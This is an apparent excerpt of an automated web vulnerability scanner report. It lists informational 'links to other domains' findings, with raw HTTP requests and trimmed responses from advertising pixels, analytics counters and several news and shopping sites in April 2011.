Set-Cookie: apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 14:41:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
<!-- matched campaign #10641 is eligible -->
<img width=1 height=1 border=0 src="http://ad.trafficmp.com/a/bpix?adv=652&id=1005&r=">
<!-- "Net Suite" c/o "FetchBack", segment: 'Net Suite Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
<!-- End ad tag -->
<img src="http://pixel.rubiconproject.com/tap.php?v=2939|1" border="0" width="1" height="1">
<!-- "NetSuite AU" c/o "FetchBack", segment: 'NetSuiteAU Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment" width="1" height="1" />
</noscript>
...[SNIP]...
<!-- "NetSuite Singapore" c/o "FetchBack", segment: 'NetSuite Sing Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag -->
<img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1" width="1" height="1" border="0" >
<!-- "NetSuite UK" c/o "FetchBack", segment: 'NetSuite UK Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag -->
<img src="http://ad.adtegrity.net/pixel?id=494024&t=2" width="1" height="1" />
<!-- "NetSuite HonKong" c/o "FetchBack", segment: 'NetSuite HonKong Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment" width="1" height="1" />
</noscript>
...[SNIP]...
<!-- Advertiser 'OpenX Limited', Include user in segment 'Fetchback_148' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldmanager.com/pixel?id=478454&t=2" width="1" height="1" />
<!-- End of segment tag -->
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1801246;dcnet=4591;boom=23534;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
...[SNIP]...
<!-- Advertiser 'FetchBack (m)', Include user in segment 'retargeting - 242' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.bannerconnect.net/pixel?id=495608&t=2" width="1" height="1" />
<!-- End of segment tag -->
<img src="http://idcs.interclick.com/Segment.aspx?sid=ab470e57-8d67-4a28-b9b1-aaf3331f5214"/>
23.64. http://playaudiomessage.com/play.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://playaudiomessage.com
Path:   /play.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /play.asp?m=538364&f=YNIZEE&ps=13&c=FFFFFF&pm=2&h=25 HTTP/1.1
Host: playaudiomessage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 25 Apr 2011 19:34:37 GMT
ServerID: 52
P3P: "CP=\"IDC CSP DOR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\""
Content-Length: 1035
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASCRBCAQ=HGPKABGBGEKMJANEMNDJEEJA; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">

<title>InstantAudioPlayer</title>

...[SNIP]...
<center>

   <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" WIDTH="75" HEIGHT="25">
       <PARAM name="movie" value="http://click-here-to-listen.com/players/iaPlay13.swf?x=2108538364YNIZEE">
...[SNIP]...
<param name="wmode" value="opaque">
       <EMBED src="http://click-here-to-listen.com/players/iaPlay13.swf?x=2108538364YNIZEE" quality="high" bgcolor="#FFFFFF" WIDTH="75" HEIGHT="25" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer" wmode=opaque></EMBED>
...[SNIP]...
23.65. http://playaudiomessage.com/play.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://playaudiomessage.com
Path:   /play.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /play.asp?m=535237&f=WCZSIT&ps=13&c=FFFFFF&pm=2&h=25 HTTP/1.1
Host: playaudiomessage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 25 Apr 2011 19:34:37 GMT
ServerID: 52
P3P: "CP=\"IDC CSP DOR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\""
Content-Length: 1035
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASCRBCAQ=IGPKABGBEEBIBBDBAKEECILD; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">

<title>InstantAudioPlayer</title>

...[SNIP]...
<center>

   <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" WIDTH="75" HEIGHT="25">
       <PARAM name="movie" value="http://click-here-to-listen.com/players/iaPlay13.swf?x=2108535237WCZSIT">
...[SNIP]...
<param name="wmode" value="opaque">
       <EMBED src="http://click-here-to-listen.com/players/iaPlay13.swf?x=2108535237WCZSIT" quality="high" bgcolor="#FFFFFF" WIDTH="75" HEIGHT="25" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer" wmode=opaque></EMBED>
...[SNIP]...
23.66. http://playaudiomessage.com/play.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://playaudiomessage.com
Path:   /play.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /play.asp?m=535240&f=ESQGHH&ps=13&c=FFFFFF&pm=2&h=25 HTTP/1.1
Host: playaudiomessage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 25 Apr 2011 19:53:56 GMT
ServerID: 52
P3P: "CP=\"IDC CSP DOR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\""
Content-Length: 1035
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASCRBCAQ=HAIOABGBIDMLPBAHEGKAIKJH; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">

<title>InstantAudioPlayer</title>

...[SNIP]...
<center>

   <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" WIDTH="75" HEIGHT="25">
       <PARAM name="movie" value="http://click-here-to-listen.com/players/iaPlay13.swf?x=2108535240ESQGHH">
...[SNIP]...
<param name="wmode" value="opaque">
       <EMBED src="http://click-here-to-listen.com/players/iaPlay13.swf?x=2108535240ESQGHH" quality="high" bgcolor="#FFFFFF" WIDTH="75" HEIGHT="25" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer" wmode=opaque></EMBED>
...[SNIP]...
23.67. http://player.vimeo.com/video/22043447  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/22043447

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /video/22043447?title=0&byline=0&portrait=0&color=2f85be HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256147786.1303575918.2.2.utmcsr=sailinganarchy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index_page1.php; __utma=256147786.658057560.1303432520.1303432520.1303575918.2

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
X-Server: 10.90.6.246
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7111

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Untitled</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opacity='70');}</style><![e
...[SNIP]...
</style><link rel="stylesheet" href="http://a.vimeocdn.com/p/1.2.2/css/player.core.opt.css?621ff"><script src="http://a.vimeocdn.com/p/1.2.2/js/player.core.opt.js?621ff"></script>
...[SNIP]...
23.68. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; NLPromocode=438708_; promocode=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:59:58 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 677005915:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54139


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<div id="header_logo"><a href="http://www.eset.com/us"><img src="/c.438708/images/eset_logo.png" alt="ESET LLC">
...[SNIP]...
<li><a href="http://www.eset.com/us/partners/worldwide-partners" class="header_partners">United States</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/company">About ESET</a>
...[SNIP]...
<li class="first_main_nav_item"><a href="http://www.eset.com/us/home">For Home</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/business/products">For Business</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/store" class="selected">Store</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/download">Download</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/support">Support</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/partners">Partners</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/rss"><span class="rss">
...[SNIP]...
<li><a href="http://www.eset.com/us/company/contact">Contact Us</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/company/privacy-policy">Privacy</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/company/legal-notices">Legal Notices</a>
...[SNIP]...
<li><a href="http://www.eset.com/us/sitemap">Sitemap</a>
...[SNIP]...
<div class="social-icons">
<a href="http://www.facebook.com/esetusa" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/facebook_icon.gif" alt="Visit ESET on Facebook"></a>
<a href="http://www.twitter.com/eset" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/twitter_icon.gif" alt="Follow ESET on Twitter"></a>
<a href="http://www.youtube.com/user/esetusa" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/youtube_icon.gif" alt="ESET YouTube Channel"></a>
<a href="http://www.eset.com/us/rss" onclick="window.open(this.href);return false;"><img src="/c.438708/images/social/rss_icon.gif" alt="Subscribe to ESET RSS feeds">
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
<div><img src="https://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt=""></div>
...[SNIP]...
23.69. http://storage.trafic.ro/js/trafic.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storage.trafic.ro
Path:   /js/trafic.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js/trafic.js?tk=5090212859213352&t_rid=romarketgidcom HTTP/1.1
Host: storage.trafic.ro
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafic_ranking=6c7f4ecfdd8l1dc980fda3f00c3621d0

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:39:00 GMT
Server: Apache
Content-type: application/x-javascript
Expires: Thu, 11 Jan 1973 16:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:39:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="ALL IND DSP COR ADM CONo CUR IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Connection: close
Content-Length: 7673

function trfc$tfCxOy (){$tfCxPy = 0;$tfCyPy='';$tfCzPy=window;$tfCzPz=$tfCzPy.location;$tfCzPA=Math;$tfCzQA=String;$tfCzQB=$tfCzQA.fromCharCode;if($tfCzPz.protocol=='file:')return;$tfCzRB=navigator;$t
...[SNIP]...
ru site-urile romanesti';$tfQSaN.appendChild($tfPSaM);}$tfRSaN=document.getElementById("trfc_trafic_script");$tfRSaN.parentNode.insertBefore(88>1?$tfQSaN:$tfPSaM,$tfRSaN);} else {document.write((88>1?'<a href="http://www.trafic.ro/?rid='+t_rid+'" target=_blank>':'')+'<img src="'+$tfNS9M+'"'+' width="88" height="31"'+(88>
...[SNIP]...
23.70. http://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.trust-guard.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.php?_m=troubleshooter&_a=view HTTP/1.1
Host: support.trust-guard.com
Proxy-Connection: keep-alive
Referer: http://support.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_sessionid40=nnfa18si4n87mc68kwytxeynpprc2i1o; SWIFT_sessionid80=79aen2tq7o9d45p59q0nb8srhrs5qbvg; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.3.10.1303758698; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:12:49 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 12475


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e
...[SNIP]...
<br>
<a href="http://www.kayako.com" target="_blank" title="Help Desk Software">Help Desk Software</a>
...[SNIP]...
23.71. http://tengrinews.kz/static/js/twitter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /static/js/twitter.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /static/js/twitter.js?1303741246 HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:36:51 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Thu, 21 Apr 2011 04:41:57 GMT
ETag: "be0c2-a23-4a1665c78cf40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2595

/* womtec.ru */

var tweetUsers = ['tengrinewskz','KarimMassimov', 'MedvedevRussia', 'BarackObama','AZhumagaliev', 'KremlinRussia'];
var buildString = "";

$(document).ready(function(){

   $('#t
...[SNIP]...
<div class="user"><a href="http://twitter.com/'+this.from_user+'" target="_blank">'+this.from_user+'</a>
...[SNIP]...
</a>');
   str = str.replace(/([^\w])\@([\w\-]+)/gm,'$1@<a href="http://twitter.com/$2" target="_blank">$2</a>');
   str = str.replace(/([^\w])\#([\w\-]+)/gm,'$1<a href="http://twitter.com/search?q=%23$2" target="_blank">#$2</a>
...[SNIP]...
23.72. http://tengrinews.kz/tag/891/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /tag/891/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:34:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.3-2
Set-Cookie: PHPSESSID=2kh13g87ng9vfofjh75vcvpsb3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22992c6a53539ed93969b86244758fda88%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303742049%22%3B%7D214a8e57fbabe8f7012a7d490d65daa7; expires=Thu, 28-Apr-2011 14:34:09 GMT; path=/
Vary: Accept-Encoding
Content-Length: 32979

<!DOCTYPE html>
<html>
<head>
<title>Tengrinews.kz : .............. .................... .... ..............</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta
...[SNIP]...
<div class="lang">
                                                   <a href="http://m.tengrinews.kz/" class="mobile_version" title=".................. ............" target="_self"><img src="/static/i/m.gif" />
...[SNIP]...
</font>
                           <a href="http://en.tengrinews.kz/" title="English" target="_self">EN</a>
...[SNIP]...
<div class="radioFlash">
               <a href="http://tengrifm.kz" class="showTengriFm" target="_blank">
                   <img src="/static/images/radioFlash.png" alt="" class="png" />
...[SNIP]...
<li><a href="https://twitter.com/tengrinewskz" title="twitter" class="tw">twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/profile.php?id=100001852320591&v=wall" title="facebook" class="fb">facebook</a>
...[SNIP]...
</script>
       <a href="http://orphus.ru" id="orphus" target="_blank"><img alt=".............. Orphus" src="/static/js/orphus.gif" border="0" />
...[SNIP]...
<div class="creator"><a href="http://notamedia.ru/">........ ............ .. ................ Notamedia</a>
...[SNIP]...
<noscript>
<a href='http://zero.kz/?u=40613' target='_blank'>
<img src='http://zero.kz/c.php?u=40613' border='0px' width='88'
height='31' alt='CountZero' /></a>
...[SNIP]...
<!-- begin of Top100 code -->
<script id="top100Counter" type="text/javascript" src="http://counter.rambler.ru/top100.jcn?2378577"></script>
<noscript>
<a href="http://top100.rambler.ru/navi/2378577/">
<img src="http://counter.rambler.ru/top100.cnt?2378577" alt="Rambler's Top100" border="0" />
</a>
...[SNIP]...
<!-- Yandex.Metrika -->
   <script src="http://mc.yandex.ru/metrika/watch.js" type="text/javascript"></script>
...[SNIP]...
<div style="position:absolute"><img src="http://mc.yandex.ru/watch/1838272" alt="" /></div>
...[SNIP]...
23.73. http://webalta.ru/news.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webalta.ru
Path:   /news.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news.html?14857 HTTP/1.1
Host: webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; MG_id=7269; MG_type=news; MG_1001=1; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:08 GMT
Server: Apache/1.3.42 (Unix)
Last-Modified: Mon, 25 Apr 2011 14:18:12 GMT
ETag: "5dba7-6471-4db582a4"
Accept-Ranges: bytes
Content-Length: 25713
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>.. .............
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   
   <link rel="stylesheet" type="text/css" href="http://img.webalta.ru/public/css/style.css">
   <!--[if IE]>
...[SNIP]...
<![endif]-->
   
   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...
